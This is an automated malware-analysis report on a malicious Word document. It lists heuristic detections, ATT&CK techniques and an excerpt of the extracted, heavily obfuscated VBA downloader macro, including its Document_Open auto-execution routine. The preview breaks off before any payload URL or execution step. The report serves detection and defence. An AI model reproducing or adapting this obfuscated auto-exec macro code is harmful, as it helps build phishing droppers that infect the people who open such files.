MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV heuristic also flags it as a downloader. While the VBA code is heavily obfuscated, the presence of the Document_open macro and the downloader heuristic strongly suggests it's designed to fetch and execute a second-stage payload. No specific family could be identified.
Heuristics 6
-
ClamAV: Doc.Downloader.Generic-7469240-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7469240-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12987 bytes |
SHA-256: e643dbfd194abbb2667383b9693344899314986a9fee7d4a913179b589470142 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Jihqsout"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Vrsmnspntvm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Prcjbmcyjg As Integer
Dim Qbdckyorb As Double
Zcwbkjgpwsqz = Gujfpsgqqe
Bdemyleydh = (Socqpnabtr)
Flltnilsi = 298
Dim Dkjtfvmhy As String
Nbqpbddrrjzag = "Hic fuga."
Dim Kkuvlcsg As Double
Dim Ftvggjfoh As Integer
Dim Dxhipriydk As Boolean
Elbncdvuu = (708)
Dim Vjilkaulzo As Integer
Dim Mmnwljivv As Integer
Qvfwclmdpm = Zggyyjzdto
Dim Apgjllvntxs As Double
Dim Drznkauya As Boolean
Dim Fljmwysbqrw As Double
Csdqbrboq = (Rzqiojqzbqdz)
Rverzngevk = ("Tempore culpa veniam.")
Dwimcprpuwikm = (Xloyschj)
Dim Wqgnnefqsgtqo As String
Imounuesljt = Zuvnmqfylb
Hjuobusbjmyhv
Dim Hbjvpgosgb As Double
Dim Bbaypgcbold As Boolean
Savqfqbdg = Ovegoufy
Fobyalyruwxv = (Gtbbkvkvhykuc)
Tffjjnlusff = 201
Dim Lxesdhavse As Boolean
Kjgcnfidd = "Reprehenderit natus."
Dim Rmijvyiwfsx As Boolean
Dim Trqvvrabsb As Double
Dim Erfzwailg As Double
Vyfwkhiqn = (243)
Dim Ivonhlzpzkjeq As Boolean
Dim Wjrpyehl As Integer
Qvqtklleiijki = Lqmvmtoqgkzyy
Dim Bktrrqjvpzya As Boolean
Dim Tmazsnnupicbe As String
Dim Kmndqhzrrb As Boolean
Uxvotgtm = (Zfoegukopmzme)
Xspuvjxmls = ("Zachary")
Ujvlxkmnhola = (Dmtdisidw)
Dim Sdpbtdlj As String
Etabcszdigp = Glshkflrnhi
End Sub
Attribute VB_Name = "Bfaidczate"
Attribute VB_Base = "0{37381860-4018-46F9-9746-3785BB847609}{52D9F837-9AF7-4C15-BE90-B3E84C122B38}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Fikoomhtxmywe"
Function Trxaqzicdg()
Dim Weldychlufw As Boolean
Dim Ocnazgxk As Double
Jdtwqefvswln = Sbebwdznsmi
Bpwnejmbaef = (Pjemoaixi)
Vnjrvkgo = 420
Dim Dgwihehorwz As Integer
Oqjgyhbqtrv = "Aut."
Dim Zugpyrkplch As Double
Dim Waiqbblxu As Integer
Dim Ehheakobqq As Double
Ibyizacocbr = (595)
Dim Icqtgtet As Boolean
Dim Qjgobngoqr As Integer
Octlwrnj = Wdshyhjwzun
Dim Ytlbavnat As Integer
Dim Onzvxnflj As Integer
Dim Cwupyeursmy As Double
Rkqmnopcpksk = (Ymocghkqphk)
Gbvvqsednw = ("Illum velit dolor dolore minima dicta optio et.")
Ullnlbeqqwfej = (Kaujbqeibu)
Dim Rdllpvfl As Boolean
Ddfggtkwqlygt = Nrhqckswymmf
Qmchatdghs = Jihqsout.Vrsmnspntvm
Dim Nlrqrhtcakum As Double
Dim Ltigehtwkfb As String
Tvgremqx = Ygresvaapk
Prlmdbqbl = (Gagusqacszika)
Abjfmjyl = 942
Dim Gsipgkyjikd As String
Hkphiihg = "Necessitatibus porro sit."
Dim Aaprgcoipafmy As Integer
Dim Mpkbrbzoabu As Double
Dim Pcyivsio As Boolean
Rgtcnlwvmxuw = (184)
Dim Ftyampplensmc As Boolean
Dim Fizuwsuyzld As Double
Izhtjbdbu = Cdgbgkbj
Dim Gpvbxfkuy As Double
Dim Kjcffzcat As Double
Dim Axssmtspku As Integer
Cjmrmwsg = (Trudwakyigpu)
Jesrcjfoghavt = ("Architecto vel est.")
Eaipidayiwr = (Lymhvoiidb)
Dim Nflmcahdie As String
Eguigkulf = Hvsaeyha
Ewtegobkr = Qmchatdghs + Bfaidczate.Dowglmwp + Bfaidczate.Jhvyreanshhmg + Bfaidczate.Wbgmgpinetsvc
Dim Goauorhv As String
Dim Pbkzgyibskp As Double
Mnjmpxsh = Ypxuairngiuoa
Bkghypnplohee = (Diudmkjdhtbwi)
Xmrnnmlzvi = 610
Dim Lgsdmvhe As Double
Xgosgznxsefc = "Reprehenderit modi."
Dim Nqelrjyubjxx As Double
Dim Pbbewepkzvg As String
Dim Yqfujpxpvr As Integer
Cuceeujkxi = (417)
Dim Bfmfcrif As String
Dim Aevpniqatkfru As Integer
Guawcoqzct = Sneiqheu
Dim Phbtwogxjl As Boolean
Dim Wwiidjjetvjf As String
Dim Obpkponxftv As Double
Csejszzrizhe = (Tptxvujzfh)
Oezrpnurhmomq = ("Ipsam dolorum.")
Wgbigtduhlwzo = (Nxjxkurq)
Dim Jddhbhgpwnsd As Double
Ckkrfsnfjezr = Vdeprowpznge
Ksgzqgqfnb = Ewtegobkr + Bfaidczate.Dscvywigmjcx + Bfaidczate.Htgcvqxu.Tag
Dim Fqjrpbzl As Integer
Dim Osgsqfgo As Boolean
Daqwoehpsa = Kiorgvzip
Bpykzxts = (Da
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.